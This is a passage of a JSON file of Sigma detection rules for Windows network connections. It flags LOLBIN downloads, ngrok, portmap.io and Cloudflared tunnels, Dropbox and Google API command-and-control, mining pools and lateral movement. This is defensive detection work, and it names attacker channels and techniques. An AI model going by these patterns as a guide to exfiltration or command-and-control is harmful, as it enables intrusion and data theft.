], "filename": "net_connection_win_domain_google_api_non_browser_access.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/", "https://github.com/looCiprian/GC2-sheet", "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/", "https://youtu.be/n2dFlSaBBKo", "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml" ], "tags": [ "attack.command-and-control", "attack.t1102" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7e9cf7b6-e827-11ed-a05b-0242ac120003", "value": "Suspicious Non-Browser Network Communication With Google API" }, { "description": "Detects programs that connect to uncommon destination ports", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_malware_callback_ports_uncommon.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d8c3d20-a5e1-494f-8412-4571d716cf5c", "value": "Communication To 
Uncommon Destination Ports" }, { "description": "Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.\n", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_imewdbld.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", "value": "Network Connection Initiated By IMEWDBLD.EXE" }, { "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate scripts" ], "filename": "net_connection_win_wscript_cscript_outbound_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wscript_cscript_outbound_connection.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", "value": "Outbound Network Connection Initiated By Script Interpreter" }, { "description": "Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2024-05-31", "falsepositive": [ "Legitimate use of portmap.io domains" ], "filename": "net_connection_win_domain_portmap.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/rapid7/metasploit-framework/issues/11337", "https://portmap.io/", "https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_portmap.yml" ], "tags": [ "attack.t1041", "attack.command-and-control", "attack.t1090.002", "attack.exfiltration" ] }, "related": [ { "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" }, { "dest-uuid": "69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07837ab9-60e1-481f-a74d-c31fb496a94c", "value": "Network Communication Initiated To Portmap.IO Domain" }, { "description": "Detects a network connection initiated by Cmstp.EXE\nIts uncommon for \"cmstp.exe\" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_cmstp_initiated_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_cmstp_initiated_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.003" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", "value": "Outbound Network Connection Initiated By Cmstp.EXE" }, { "description": "Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.\nThis rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.\nThis rule will require an initial baseline and tuning that is specific to your organization.\n", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-11-10", "falsepositive": [ "You may have to tune certain 
domains out that Excel may call out to, such as microsoft or other business use case domains.", "Office documents commonly have templates that refer to external addresses, like \"sharepoint.ourcompany.com\" may have to be tuned.", "It is highly recommended to baseline your activity and tune out common business use cases." ], "filename": "net_connection_win_office_outbound_non_local_ip.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://corelight.com/blog/detecting-cve-2021-42292", "https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml" ], "tags": [ "attack.execution", "attack.t1203" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "value": "Office Application Initiated Network Connection To Non-Local IP" }, { "description": "Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying." 
], "filename": "net_connection_win_python.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://pypi.org/project/scapy/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", "value": "Python Initiated Connection" }, { "description": "Detects network connections to Cloudflared tunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-05-27", "falsepositive": [ "Legitimate use of cloudflare tunnels will also trigger this." 
], "filename": "net_connection_win_domain_cloudflared_communication.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_cloudflared_communication.yml" ], "tags": [ "attack.exfiltration", "attack.command-and-control", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cd1dcdc-6edf-4896-86dc-d1f19ad64903", "value": "Network Connection Initiated To Cloudflared Tunnels Domains" }, { "description": "Detects a possible remote connections to Silenttrinity c2", "meta": { "author": "Kiran kumar s, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" ], "tags": [ "attack.execution", "attack.t1127.001" ] }, "related": [ { "dest-uuid": "c92e3d68-2349-49e4-a341-7edca2deff96", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "value": "Silenttrinity Stager Msbuild Activity" }, { "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", "meta": { "author": "Florian Roth (Nextron Systems)", 
"creation_date": "2022-04-29", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_rdp_to_http.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.lateral-movement", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "value": "RDP to HTTP or HTTPS Target Ports" }, { "description": "Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.\n", "meta": { "author": "frack113", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate scripts" ], "filename": "net_connection_win_wscript_cscript_local_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wscript_cscript_local_connection.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } 
], "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", "value": "Local Network Connection Initiated By Script Interpreter" }, { "description": "Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Other ports can be used, apply additional filters accordingly" ], "filename": "net_connection_win_office_uncommon_ports.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control" ] }, "uuid": "3b5ba899-9842-4bc2-acc2-12308498bf42", "value": "Office Application Initiated Network Connection Over Uncommon Ports" }, { "description": "Detects a network connection initiated by the Add-In deployment cache updating utility \"AddInutil.exe\".\nThis could indicate a potential command and control communication as this tool doesn't usually initiate network activity.\n", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_addinutil_initiated.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_addinutil_initiated.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5205613d-2a63-4412-a895-3a2458b587b3", "value": "Network Connection Initiated By AddinUtil.EXE" }, { "description": "Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-08-30", "falsepositive": [ "Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule." ], "filename": "net_connection_win_susp_file_sharing_domains_susp_folders.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", "https://twitter.com/M_haggis/status/1032799638213066752", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://twitter.com/M_haggis/status/900741347035889665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "value": "Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder" }, { "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.\nOne could 
easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_wuauclt_network_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://dtm.uk/wuauclt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", "value": "Potentially Suspicious Wuauclt Network Connection" }, { "description": "Detects a network connection that is initiated by the \"notepad.exe\" process.\nThis might be a sign of process injection from a beacon process or something similar.\nNotepad rarely initiates a network communication except when printing documents for example.\n", "meta": { "author": "EagleEye Team", "creation_date": "2020-05-14", "falsepositive": [ "Printing documents via notepad might cause communication with the printer via port 9100 or similar." 
], "filename": "net_connection_win_notepad.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", "https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", "value": "Network Connection Initiated Via Notepad.EXE" }, { "description": "Detects \"RegAsm.exe\" initiating a network connection to public IP adresses", "meta": { "author": "frack113", "creation_date": "2024-04-25", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_regasm_network_activity.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/", "https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regasm_network_activity.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.009" ] }, "related": [ { "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0531e43a-d77d-47c2-b89f-5fe50321c805", "value": "RegAsm.EXE Initiating Network Connection To Public IP" }, { "description": "Detects outbound network connection initiated by Microsoft Dialer.\nThe 
Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.\nThis is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is \"Rhadamanthys\"\n", "meta": { "author": "CertainlyP", "creation_date": "2024-04-26", "falsepositive": [ "In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives." ], "filename": "net_connection_win_dialer_initiated_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d", "https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html", "https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/", "https://tria.ge/240301-rk34sagf5x/behavioral2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dialer_initiated_connection.yml" ], "tags": [ "attack.execution", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37e4024a-6c80-4d8f-b95d-2e7e94f3a8d1", "value": "Outbound Network Connection Initiated By Microsoft Dialer" }, { "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-03", "falsepositive": [ "Unknown" ], "filename": 
"net_connection_win_susp_binary_no_cmdline.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "20384606-a124-4fec-acbb-8bd373728613", "value": "Suspicious Network Connection Binary No CommandLine" }, { "description": "Detects an executable initiating a network connection to \"ngrok\" domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-16", "falsepositive": [ "Legitimate use of the ngrok service." ], "filename": "net_connection_win_domain_ngrok.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://ngrok.com/blog-post/new-ngrok-domains", "https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf", "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://ngrok.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18249279-932f-45e2-b37a-8925f2597670", "value": "Process Initiated Network Connection To Ngrok Domain" }, { "description": "Detects uncommon network connections to the Active Directory Web 
Services (ADWS) from processes not typically associated with ADWS management.\n", "meta": { "author": "@kostastsale", "creation_date": "2024-01-26", "falsepositive": [ "ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives." ], "filename": "net_connection_win_adws_unusual_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md", "https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_adws_unusual_connection.yml" ], "tags": [ "attack.discovery", "attack.t1087" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b3ad3c0f-c949-47a1-a30e-b0491ccae876", "value": "Uncommon Connection to Active Directory Web Services" }, { "description": "Detects initiated network connections to crypto mining pools", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-10-26", "falsepositive": [ "Unlikely" ], "filename": "net_connection_win_domain_crypto_mining_pools.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.poolwatch.io/coin/monero", "https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt", "https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_crypto_mining_pools.yml" ], "tags": [ "attack.impact", "attack.t1496" ] }, "related": [ { "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", "value": "Network Communication With Crypto Mining Pool" }, { "description": "Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.\nAn initial baseline is required before using this utility to exclude third party RDP tooling that you might use.\n", "meta": { "author": "Markus Neis", "creation_date": "2019-05-15", "falsepositive": [ "Third party RDP tools" ], "filename": "net_connection_win_rdp_outbound_over_non_standard_tools.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", "value": "Outbound RDP Connections Over Non-Standard Tools" }, { "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Web Browsers and third party application might generate similar activity. An initial baseline is required." 
], "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Rubeus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" ], "tags": [ "attack.credential-access", "attack.t1558", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", "value": "Uncommon Outbound Kerberos Connection" }, { "description": "Detects an initiated network connection by a non browser process on the system to \"azurewebsites.net\". 
The latter was often used by threat actors as a malware hosting and exfiltration site.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-24", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_domain_azurewebsites.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia", "https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/", "https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_azurewebsites.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1102.001" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5c80b618-0dbb-46e6-acbb-03d90bcb6d83", "value": "Network Connection Initiated To AzureWebsites.NET By Non-Browser Process" }, { "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-20", "falsepositive": [ "Legitimate use of the API with a tool that the author wasn't aware of" ], "filename": "net_connection_win_domain_dropbox_api.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", 
"https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_dropbox_api.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", "value": "Suspicious Dropbox API Usage" }, { "description": "Detects an executable initiating a network connection to \"ngrok\" tunneling domains.\nAttackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\nWhile communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-03", "falsepositive": [ "Legitimate use of the ngrok service." 
